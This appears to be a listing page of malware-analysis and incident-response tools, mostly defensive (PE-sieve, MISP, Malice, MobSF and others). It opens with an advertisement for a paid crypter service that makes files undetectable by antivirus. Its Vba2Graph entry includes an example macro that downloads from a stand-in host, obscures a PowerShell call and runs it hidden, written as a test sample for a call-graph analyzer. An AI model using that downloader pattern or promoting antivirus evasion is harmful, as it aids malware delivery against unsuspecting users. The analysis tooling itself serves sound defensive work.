
Category: Malware Analysis

NEW TOOLS

FUD 100% service packages ready for sale

We offer a monthly crypter service to make your files undetectable when encrypted! This is how it works: you zip the files you want to encrypt and send them to our email cybersec@cybeseclabs.com; we then encrypt your file(s) and make them FUD 100% (undetectable by any antivirus) and send them back to your email! We offer 3 packages: Standard, Premium, Ultimate. All those packages offer some unique features to encrypt your file!

Windows10

Black Window 10 v2

Black Window Enterprise 10, Codename: Polemos. Black Window 10 Enterprise is the first Windows-based penetration testing distribution with Linux integrated! The system comes activated with a digital license for Windows Enterprise! It supports Windows apps and Linux apps, GUI and terminal apps! It comes with a ton of hacking tools plus all the tools that are included with the latest release of Cerberus Linux! It has managed to implement Cerberus OS within Windows. Offers the stability of a Windows system…

Carbonblack, CIRTKit, Incident response, Malware Analysis, NEW TOOLS, Viper

CIRTKit – Tools For The Computer Incident Response Team

One DFIR console to rule them all. Built on top of the Viper Framework.

Documentation
Please see the wiki for more information about CIRTKit and documentation.

Roadmap
Future integrations: Bit9, Palo Alto Networks, EnCase/FTK
Future modules: Packet Analysis (possibly Dshell), Javascript Unpacking/Deobfuscation, Volatility Memory Analysis Framework, Hex Viewer/Editor, Scripting Framework

Automation is key. Scripting is key to DFIR, thus needs to be available in CIRTKit.

Download CIRTKit

Elasticsearch, golang, Kibana, Malice, Malware Analysis, Malware Research, NEW TOOLS, Scan, VirusTotal

Malice – VirusTotal Wanna Be (Now With 100% More Hipster)

Malice's mission is to be a free open source version of VirusTotal that anyone can use at any scale, from an independent researcher to a Fortune 500 company.

Try It Out
DEMO: demo.malice.io
username: malice
password: ecilam

Requirements
Hardware: ~16GB disk space, ~4GB RAM
Software: Docker

Getting Started (OSX)
Install: $ brew install maliceio/tap/malice

Usage: malice [OPTIONS] COMMAND [arg...]
Open Source Malware Analysis Framework
Version: 0.3.11
Author: blacktop
  --debug, -D     Enable debug mode [$MALICE_DEBUG]
  --help, -h      show help
  --version, -v   print the version
Commands:
  scan      Scan a file
  watch     Watch a folder
  lookup    Look up a file hash
  elk       Start…

Fsharp, Malware Analysis, NEW TOOLS, Reverse Engineering, Runtime Inspector, Shed

Shed – .NET Runtime Inspector

Shed is an application that allows you to inspect the .NET runtime of a program in order to extract useful information. It can be used to inspect malicious applications to get a first general overview of which information is stored once the malware is executed.

Shed is able to:
Inject a .NET Assembly into a remote process (both managed and un-managed)
Extract all objects stored in the managed heap
Print strings stored in memory
Save a snapshot of the heap in JSON format for post-processing
Dump all…

Malboxes, Malware Analysis, Malware Research, NEW TOOLS, Python3, Virtual Machine

Malboxes – Builds Malware Analysis Windows VMs So That You Don’t Have To

Builds malware analysis Windows virtual machines so that you don’t have to.

Requirements
Python 3.3+
packer
vagrant
VirtualBox or a vSphere / ESXi server

Minimum specs for the build machine
At least 5 GB of RAM
VT-x extensions strongly recommended

Fedora
dnf install ruby-devel gcc-c++ zlib-devel
vagrant plugin install winrm winrm-fs

Debian
apt install vagrant git python3-pip

Installation
Linux/Unix
Install git, vagrant and packer using your distribution’s packaging tool (packer is sometimes called packer-io).
pip install malboxes: sudo pip3 install git+

Note: Starting with Windows 10, Hyper-V is always running below the operating…

Anti Malware, Detect Malware, Libpeconv, Malware Analysis, NEW TOOLS, Pe Analyzer, Pe Dumper, Pe Format, Pe Sieve, Process Analyzer, Scans

PE-sieve – Recognizes And Dumps A Variety Of Potentially Malicious Implants (Replaced/Injected PEs, Shellcodes, Hooks, In-Memory Patches)

PE-sieve is a light-weight tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. It recognizes and dumps a variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches. It detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc.

Uses library: libpeconv
Recursive clone to get the repo together with the submodule:
git clone --recursive

Builds*
*Those builds are available for testing and they may be ahead of the official release: 32-bit, 64-bit
Download…

Incident response, Malware Analysis, MISP, NEW TOOLS, Threat Analysis, Threat Hunting, Threat Intelligence, Threat Intelligence Platform, Threat Sharing

MISP – Malware Information Sharing Platform and Threat Sharing

The objective of MISP is to foster the sharing of structured information within the security community and abroad. MISP provides functionalities to support the exchange of information, but also its consumption by Network Intrusion Detection Systems (NIDS), LIDS, log analysis tools and SIEMs. MISP is an open source software solution for collecting, storing, distributing and sharing cyber security indicators and threats from cyber security incident analysis and malware analysis. MISP is designed by and for incident analysts, security and ICT professionals…

Malicious Macro, Malware Analysis, Malware Detection, NEW TOOLS, Vba2Graph

Vba2Graph – Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

A tool for security researchers who waste their time analyzing malicious Office macros. Generates a VBA call graph, with potentially malicious keywords highlighted. Allows for quick analysis of malicious macros and easy understanding of the execution flow. @MalwareCantFly

Features
Keyword highlighting
VBA Properties support
External function declaration support
Tricky macros with "_Change" execution triggers
Fancy color schemes!

Pros
Pretty fast
Works well on most malicious macros observed in the wild

Cons
Static (dynamically resolved calls would not be recognized)

Examples
Example 1: Trickbot downloader - utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.
Example 2: Check out the Examples folder…
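As an added example (not Vba2Graph's own code), the Python below sketches the static analysis the excerpt describes: procedures are split out of a VBA module, call edges are collected, Declare statements become external API nodes, an assignment to a control's Text/Value property is linked to that control's _Change handler so a Resize -> _Change chain appears in the graph, and a keyword list chosen for this example marks suspicious procedures. The macro source is constructed and imitates the trigger chain described for the Trickbot downloader; as the Cons bullet says, the analysis is static, so the reversed string never reveals "powershell".

```python
"""Static VBA call graph with suspicious-keyword highlighting (added example in the spirit of
Vba2Graph, not the tool's own code; the macro at the bottom is constructed for the example)."""
import re
from collections import defaultdict

# Keywords to highlight (selection made for this example, not Vba2Graph's list).
SUSPICIOUS = ["Shell", "Run", "Exec", "CreateObject", "GetObject", "Environ", "StrReverse",
              "Chr", "CallByName", "URLDownloadToFileA", "powershell", "cmd.exe"]
KEYWORD_RES = [(k, re.compile(r"\b" + re.escape(k) + r"\b", re.I)) for k in SUSPICIOUS]
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)\s*\(", re.I)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
DECLARE_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?Declare\s+(?:PtrSafe\s+)?(?:Sub|Function)\s+"
                        r'([A-Za-z_]\w*).*?\bLib\s+"([^"]+)"', re.I)
# Procedures that run without the user invoking a macro: auto-exec names and control events.
TRIGGER_RE = re.compile(r"_(Change|Resize|Click|Layout|Activate|Open)$|^Auto_?Open$", re.I)
# Assigning a control's Text/Value fires its _Change handler: an edge no Call statement shows.
EVENT_ASSIGN_RE = re.compile(r"\b([A-Za-z_]\w*)\.(?:Text|Value)\s*=", re.I)

def strip_comment(line):
    """Drop a trailing ' comment while ignoring apostrophes inside string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def parse_vba(src):
    """Split a module into {procedure: body lines} and {declared API: library}."""
    bodies, declares, current = {}, {}, None
    for raw in src.splitlines():
        line = strip_comment(raw)
        if m := DECLARE_RE.match(line):
            declares[m.group(1)] = m.group(2)
        elif m := PROC_RE.match(line):
            current = m.group(1)
            bodies[current] = []
        elif END_RE.match(line):
            current = None
        elif current is not None:
            bodies[current].append(line)
    return bodies, declares

def analyze(src):
    """Call edges, implicit event edges, keyword flags, entry points and never-called procedures."""
    bodies, declares = parse_vba(src)
    canon = {n.lower(): n for n in list(bodies) + list(declares)}  # VBA names are case-insensitive
    edges, flags = defaultdict(set), defaultdict(set)
    for proc, lines in bodies.items():
        for line in lines:
            code = re.sub(r'"[^"]*"', '""', line)  # edges come from code, not from string contents
            for ident in re.findall(r"[A-Za-z_]\w*", code):
                target = canon.get(ident.lower())
                if target and target != proc:
                    edges[proc].add(target)
            if (m := EVENT_ASSIGN_RE.search(code)) and (h := canon.get(m.group(1).lower() + "_change")):
                edges[proc].add(h)          # implicit edge through the Change event
            for k, rx in KEYWORD_RES:       # keywords are matched on the whole line, strings included
                if rx.search(line):
                    flags[proc].add(k)
    called = set().union(*edges.values())
    return {"declares": declares,
            "edges": {p: sorted(t) for p, t in edges.items()},
            "flags": {p: sorted(f) for p, f in flags.items()},
            "entry_points": sorted(p for p in bodies if TRIGGER_RE.search(p)),
            "uncalled": sorted(p for p in bodies if p not in called)}

def to_dot(result):
    """Graphviz DOT: triggers in bold, flagged procedures in red with their keywords."""
    out = ["digraph macro {"]
    out += ['  "%s" [style=bold];' % p for p in result["entry_points"]]
    out += ['  "%s" [color=red, label="%s\\n%s"];' % (p, p, ", ".join(ks)) for p, ks in result["flags"].items()]
    for src, targets in result["edges"].items():
        out += ['  "%s" -> "%s";' % (src, t) for t in targets]
    return "\n".join(out + ["}"])

SAMPLE_MACRO = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long
Private Sub UserForm_Resize()
    TextBox1.Text = "go"            ' the assignment fires TextBox1_Change
End Sub
Private Sub TextBox1_Change()
    Stage2 Decode("llehsrewop")     ' reversed string keeps "powershell" out of a static scan
End Sub
Private Function Decode(s As String) As String
    Decode = StrReverse(s)
End Function
Private Sub Stage2(cmd As String)
    Dim o As Object
    URLDownloadToFileA 0, "http://example.invalid/a.bin", Environ("TEMP") & "\a.bin", 0, 0
    Set o = CreateObject("WScript.Shell")
    o.Run cmd & " -nop -w hidden -enc AAAA", 0
End Sub
'''

if __name__ == "__main__":
    print(to_dot(analyze(SAMPLE_MACRO)))
```

The DOT output can be rendered with `dot -Tpng`. On the sample it shows UserForm_Resize -> TextBox1_Change -> {Decode, Stage2} -> URLDownloadToFileA, with Decode flagged for StrReverse and Stage2 for CreateObject, Environ, Run, Shell and the declared download API; TextBox1_Change itself carries no flag because the command string is only assembled at run time.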

GNU, Mac, Malware Analysis, NEW TOOLS, Virtual Machine

Droidefense – Advanced Android Malware Analysis Framework

Droidefense (originally named atom: analysis through observation machine) is the codename for an Android apps/malware analysis/reversing tool. It was built focused on the security issues and tricks that malware researchers face in their everyday work. For those situations where the malware has anti-analysis routines, Droidefense attempts to bypass them in order to get to the code and the 'bad boy' routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipe detection, tracer pid check, and so on. Droidefense uses an innovative…

Android Security, ARM, Binary Analysis, Dynamic Analysis, iOS, iOS Security, Malware Analysis, Mobile Security, Mobile Security Framework, MobSF, NEW TOOLS, Static Analysis, Windows Mobile Security

MobSF (Mobile Security Framework) v1.0 – Mobile (Android/iOS) Automated Pen-Testing Framework

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework capable of performing static, dynamic and malware analysis. It can be used for effective and fast security analysis of Android, iOS and Windows mobile applications and supports both binaries (APK, IPA & APPX) and zipped source code. MobSF can do dynamic application testing at runtime for Android apps and has Web API fuzzing capabilities powered by CapFuzz, a Web API specific security scanner. MobSF is designed to make your CI/CD…